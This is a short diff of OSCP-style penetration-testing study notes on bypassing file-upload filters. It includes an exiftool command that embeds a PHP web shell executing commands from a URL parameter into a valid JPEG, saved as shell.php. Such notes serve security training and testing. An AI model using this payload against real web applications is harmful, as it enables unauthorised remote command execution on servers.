psyfix/Offensive-Security-Notes/OSCP/Web/File Upload.md

 3. Change the extension to match what the application is expecting.
 4. Browse to your file, is it executed?

-#Is it scanning the content?
+#Insert the payload directly inside a real valid file type it is accepting.
+This will apply the signature at the start.
 exiftool -Comment="<?php system($_GET['cmd']); ?>" <YOUR-INPUT-IMAGE>.jpg -o shell.php
 ```